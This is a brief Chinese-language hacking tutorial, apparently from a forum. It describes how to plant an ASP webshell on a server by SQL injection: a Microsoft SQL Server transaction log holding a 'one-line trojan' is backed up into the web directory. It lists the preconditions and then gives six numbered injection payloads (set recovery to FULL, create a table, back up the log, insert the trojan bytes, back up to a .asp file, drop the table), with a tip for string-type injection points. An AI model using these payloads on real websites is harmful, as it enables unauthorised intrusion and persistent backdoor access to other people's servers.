一、前言 这是一种导出日志文件到web目录来获得shell的备份方法。
1.重用性好 多次备份的成功率
2.备份的SHell小 相对差异备份而言
3.成功率高 目前用backup log来测试的成功率是100%,就这样分析似乎不应该有失败的情况。
二、条件
1、必需得知道Web目录
2.Web和数据库没有分离
PS:如果WEB和数据库分离,并不代表我们没有机会,我们照样可以备份,只是需要满足些条件。
三、具体步骤:
第一步: ;alter database 库名 set RECOVERY FULL–
第二步: ;create table cmd (a image)–
第三步: ;backup log 库名 to disk = ‘c:\cmd’ with init–
这样有点类似于增量备份的第一步,不过有点不同的是,做了这一步以后,备份出来的可用的shell是固定的。
第四步: ;insert into cmd (a) values (0x一句话木马)–
第五步: ;backup log 库名 to disk = ‘Web路径\hack58.asp’–
第六步: ;drop table cmd–
PS:如果是字符型,请一定在语句前加’
